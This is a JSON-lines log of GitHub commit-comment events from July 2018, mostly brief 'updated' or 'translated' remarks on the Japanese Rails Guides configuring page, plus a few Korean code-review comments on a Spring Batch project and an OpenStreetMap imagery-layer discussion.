{"id":"7933677065","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632766,"position":417,"line":467,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:44:36Z","updated_at":"2018-07-08T09:44:36Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:44:36Z"}
{"id":"7933677114","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632767,"position":423,"line":473,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:44:39Z","updated_at":"2018-07-08T09:44:39Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:44:39Z"}
{"id":"7933677205","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632768,"position":449,"line":497,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:44:43Z","updated_at":"2018-07-08T09:44:43Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:44:43Z"}
{"id":"7933677334","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632769,"position":491,"line":523,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:44:50Z","updated_at":"2018-07-08T09:44:50Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:44:50Z"}
{"id":"7933677395","type":"CommitCommentEvent","actor":{"login":"kingbbode"},"repo":{"name":"10duck/coduck-project"},"payload":{"comment":{"id":29632770,"position":1,"line":1,"path":"coduck-batch/src/main/resources/import.sql","commit_id":"feb1b3923ac6449e23e276c4835f98675ab4bd3d","created_at":"2018-07-08T09:44:54Z","updated_at":"2018-07-08T09:44:54Z","author_association":"CONTRIBUTOR","body":"테스트에서 Before 어노테이션을 활용해요."}},"created_at":"2018-07-08T09:44:54Z"}
{"id":"7933677544","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632772,"position":553,"line":581,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:45:04Z","updated_at":"2018-07-08T09:45:04Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:45:04Z"}
{"id":"7933677840","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632775,"position":563,"line":598,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:45:17Z","updated_at":"2018-07-08T09:45:17Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:45:17Z"}
{"id":"7933677948","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632776,"position":590,"line":656,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:45:23Z","updated_at":"2018-07-08T09:45:23Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:45:23Z"}
{"id":"7933678134","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632777,"position":598,"line":663,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:45:33Z","updated_at":"2018-07-08T09:45:33Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:45:33Z"}
{"id":"7933678263","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632778,"position":671,"line":743,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:45:39Z","updated_at":"2018-07-08T09:45:39Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:45:39Z"}
{"id":"7933678418","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632779,"position":680,"line":786,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:45:47Z","updated_at":"2018-07-08T09:45:47Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:45:47Z"}
{"id":"7933678513","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632781,"position":704,"line":903,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:45:53Z","updated_at":"2018-07-08T09:45:53Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:45:53Z"}
{"id":"7933678699","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632783,"position":752,"line":1018,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:46:03Z","updated_at":"2018-07-08T09:46:03Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:46:03Z"}
{"id":"7933679235","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632786,"position":777,"line":1062,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:46:27Z","updated_at":"2018-07-08T09:46:27Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:46:27Z"}
{"id":"7933679477","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632787,"position":798,"line":1133,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:46:38Z","updated_at":"2018-07-08T09:46:38Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:46:38Z"}
{"id":"7933679612","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632788,"position":819,"line":1147,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:46:46Z","updated_at":"2018-07-08T09:46:46Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:46:46Z"}
{"id":"7933679704","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632789,"position":822,"line":1149,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:46:51Z","updated_at":"2018-07-08T09:46:51Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:46:51Z"}
{"id":"7933679801","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632790,"position":828,"line":1153,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:46:56Z","updated_at":"2018-07-08T09:46:56Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:46:56Z"}
{"id":"7933679869","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632791,"position":831,"line":1155,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:47:01Z","updated_at":"2018-07-08T09:47:01Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:47:01Z"}
{"id":"7933679875","type":"CommitCommentEvent","actor":{"login":"tyrasd"},"repo":{"name":"osmlab/editor-layer-index"},"payload":{"comment":{"id":29632792,"position":null,"line":null,"path":null,"commit_id":"380df00dfb00848050037021c9d7c354d473a97e","created_at":"2018-07-08T09:47:01Z","updated_at":"2018-07-08T09:47:01Z","author_association":"MEMBER","body":"Hi. Re-adding the `SouthTyrolOrthofoto2014` layer was not necessary, because the newer `SouthTyrolOrthofoto2014-2015` layer includes the same data and has larger coverage (i.e. the gaps of the 2014 layer were filled with 2015 data). Only in a few places in the south of South Tyrol the 2014 layer extends a little bit further into the neighboring province (Trentino). That's why I had replaced it in 0581ba32659a0f89a63b22cdcabf843ab3fb49c5. Mind if I remove it again, or should we keep it for the small additional coverage?"}},"created_at":"2018-07-08T09:47:01Z"}
{"id":"7933679914","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632793,"position":834,"line":1157,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:47:04Z","updated_at":"2018-07-08T09:47:04Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:47:04Z"}
{"id":"7933679973","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632794,"position":837,"line":1159,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:47:07Z","updated_at":"2018-07-08T09:47:07Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:47:07Z"}
{"id":"7933680040","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632795,"position":840,"line":1161,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:47:10Z","updated_at":"2018-07-08T09:47:10Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:47:10Z"}
{"id":"7933680096","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632796,"position":843,"line":1163,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:47:13Z","updated_at":"2018-07-08T09:47:13Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:47:13Z"}
{"id":"7933680161","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632797,"position":846,"line":1165,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:47:17Z","updated_at":"2018-07-08T09:47:17Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:47:17Z"}
{"id":"7933680219","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632798,"position":849,"line":1167,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:47:20Z","updated_at":"2018-07-08T09:47:20Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:47:20Z"}
{"id":"7933680273","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632799,"position":852,"line":1169,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:47:24Z","updated_at":"2018-07-08T09:47:24Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:47:24Z"}
{"id":"7933680386","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632800,"position":855,"line":1171,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:47:31Z","updated_at":"2018-07-08T09:47:31Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:47:31Z"}
{"id":"7933680437","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632801,"position":858,"line":1173,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:47:34Z","updated_at":"2018-07-08T09:47:34Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:47:34Z"}
{"id":"7933680476","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632802,"position":861,"line":1175,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:47:37Z","updated_at":"2018-07-08T09:47:37Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:47:37Z"}
{"id":"7933680597","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632803,"position":864,"line":1177,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:47:43Z","updated_at":"2018-07-08T09:47:43Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:47:43Z"}
{"id":"7933680685","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632804,"position":867,"line":1179,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:47:48Z","updated_at":"2018-07-08T09:47:48Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:47:48Z"}
{"id":"7933680823","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632805,"position":870,"line":1181,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:47:55Z","updated_at":"2018-07-08T09:47:55Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:47:55Z"}
{"id":"7933680897","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632806,"position":874,"line":1184,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:47:58Z","updated_at":"2018-07-08T09:47:58Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:47:58Z"}
{"id":"7933681006","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632807,"position":877,"line":1186,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:48:04Z","updated_at":"2018-07-08T09:48:04Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:48:04Z"}
{"id":"7933681098","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632808,"position":880,"line":1188,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:48:09Z","updated_at":"2018-07-08T09:48:09Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:48:09Z"}
{"id":"7933681225","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632809,"position":883,"line":1190,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:48:15Z","updated_at":"2018-07-08T09:48:15Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:48:15Z"}
{"id":"7933681321","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632810,"position":886,"line":1192,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:48:19Z","updated_at":"2018-07-08T09:48:19Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:48:19Z"}
{"id":"7933681380","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632811,"position":889,"line":1194,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:48:22Z","updated_at":"2018-07-08T09:48:22Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:48:22Z"}
{"id":"7933681441","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632812,"position":892,"line":1196,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:48:25Z","updated_at":"2018-07-08T09:48:25Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:48:25Z"}
{"id":"7933681490","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632813,"position":895,"line":1198,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:48:29Z","updated_at":"2018-07-08T09:48:29Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:48:29Z"}
{"id":"7933681542","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632814,"position":898,"line":1200,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:48:32Z","updated_at":"2018-07-08T09:48:32Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:48:32Z"}
{"id":"7933681612","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632816,"position":901,"line":1202,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:48:36Z","updated_at":"2018-07-08T09:48:36Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:48:36Z"}
{"id":"7933681668","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632819,"position":904,"line":1204,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:48:39Z","updated_at":"2018-07-08T09:48:39Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:48:39Z"}
{"id":"7933681726","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632820,"position":907,"line":1206,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:48:42Z","updated_at":"2018-07-08T09:48:42Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:48:42Z"}
{"id":"7933681783","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632821,"position":910,"line":1208,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:48:45Z","updated_at":"2018-07-08T09:48:45Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:48:45Z"}
{"id":"7933681841","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632822,"position":913,"line":1210,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:48:49Z","updated_at":"2018-07-08T09:48:49Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:48:49Z"}
{"id":"7933681934","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632823,"position":916,"line":1212,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:48:53Z","updated_at":"2018-07-08T09:48:53Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:48:53Z"}
{"id":"7933682029","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632825,"position":933,"line":1228,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:48:58Z","updated_at":"2018-07-08T09:48:58Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:48:58Z"}
{"id":"7933682111","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632826,"position":942,"line":1243,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:49:02Z","updated_at":"2018-07-08T09:49:02Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:49:02Z"}
{"id":"7933682168","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632827,"position":945,"line":1245,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:49:05Z","updated_at":"2018-07-08T09:49:05Z","author_association":"COLLABORATOR","body":"updated & fixed"}},"created_at":"2018-07-08T09:49:05Z"}
{"id":"7933682282","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632829,"position":955,"line":1252,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:49:10Z","updated_at":"2018-07-08T09:49:10Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:49:10Z"}
{"id":"7933682400","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632830,"position":964,"line":1258,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:49:15Z","updated_at":"2018-07-08T09:49:15Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:49:15Z"}
{"id":"7933682474","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632833,"position":975,"line":1268,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:49:19Z","updated_at":"2018-07-08T09:49:19Z","author_association":"COLLABORATOR","body":"newly translated the section"}},"created_at":"2018-07-08T09:49:19Z"}
{"id":"7933682572","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632834,"position":981,"line":1273,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:49:23Z","updated_at":"2018-07-08T09:49:23Z","author_association":"COLLABORATOR","body":"translated"}},"created_at":"2018-07-08T09:49:23Z"}
{"id":"7933682619","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632835,"position":992,"line":1282,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:49:26Z","updated_at":"2018-07-08T09:49:26Z","author_association":"COLLABORATOR","body":"translated"}},"created_at":"2018-07-08T09:49:26Z"}
{"id":"7933682684","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632836,"position":996,"line":1285,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:49:30Z","updated_at":"2018-07-08T09:49:30Z","author_association":"COLLABORATOR","body":"translated"}},"created_at":"2018-07-08T09:49:30Z"}
{"id":"7933682742","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632837,"position":1005,"line":1303,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:49:33Z","updated_at":"2018-07-08T09:49:33Z","author_association":"COLLABORATOR","body":"translated"}},"created_at":"2018-07-08T09:49:33Z"}
{"id":"7933682796","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632838,"position":1012,"line":1309,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:49:36Z","updated_at":"2018-07-08T09:49:36Z","author_association":"COLLABORATOR","body":"translated"}},"created_at":"2018-07-08T09:49:36Z"}
{"id":"7933682844","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632839,"position":1055,"line":1352,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:49:39Z","updated_at":"2018-07-08T09:49:39Z","author_association":"COLLABORATOR","body":"translated"}},"created_at":"2018-07-08T09:49:39Z"}
{"id":"7933683306","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632840,"position":825,"line":1151,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:50:03Z","updated_at":"2018-07-08T09:50:03Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:50:03Z"}
{"id":"7933684175","type":"CommitCommentEvent","actor":{"login":"3TUSK"},"repo":{"name":"ZengineeringTeam/ZenTweaker"},"payload":{"comment":{"id":29632843,"position":null,"line":null,"path":null,"commit_id":"5e9ba0e77c7d1e910b218ad2442055c96b389314","created_at":"2018-07-08T09:50:47Z","updated_at":"2018-07-08T09:50:47Z","author_association":"CONTRIBUTOR","body":"Edit: not the #7 here, but ZengineeringTeam/Zengineering#7.\r\n\r\nInitial close ZengineeringTeam/Zengineering#7."}},"created_at":"2018-07-08T09:50:47Z"}
{"id":"7933685567","type":"CommitCommentEvent","actor":{"login":"kingbbode"},"repo":{"name":"10duck/coduck-project"},"payload":{"comment":{"id":29632847,"position":13,"line":13,"path":"coduck-batch/src/main/java/com/coduck/season/step/processor/SeasonProcessor.java","commit_id":"feb1b3923ac6449e23e276c4835f98675ab4bd3d","created_at":"2018-07-08T09:52:05Z","updated_at":"2018-07-08T09:52:05Z","author_association":"CONTRIBUTOR","body":"Component 방식을 쓰지말고\r\n각 Job이나 Step에서 어떤 방식으로 쓸지 정의할 수 있도록 Bean 방식으로 하는게 좋을 것 같아요.\r\n쓰는 곳마다 전역, Job, Step 스코프를 써야할 경우가 있을 수도 있어요.\r\n그래서 쓰는 곳에서 스코프를 정의할 수 있도록 하는게 좋은 것 같네요."}},"created_at":"2018-07-08T09:52:05Z"}
{"id":"7933685979","type":"CommitCommentEvent","actor":{"login":"kingbbode"},"repo":{"name":"10duck/coduck-project"},"payload":{"comment":{"id":29632848,"position":16,"line":16,"path":"coduck-batch/src/main/java/com/coduck/season/step/reader/SeasonReader.java","commit_id":"feb1b3923ac6449e23e276c4835f98675ab4bd3d","created_at":"2018-07-08T09:52:28Z","updated_at":"2018-07-08T09:52:28Z","author_association":"CONTRIBUTOR","body":"Component 방식을 쓰지말고\r\n각 Job이나 Step에서 어떤 방식으로 쓸지 정의할 수 있도록 Bean 방식으로 하는게 좋을 것 같아요.\r\n쓰는 곳마다 전역, Job, Step 스코프를 써야할 경우가 있을 수도 있어요.\r\n그래서 쓰는 곳에서 스코프를 정의할 수 있도록 하는게 좋은 것 같네요."}},"created_at":"2018-07-08T09:52:28Z"}
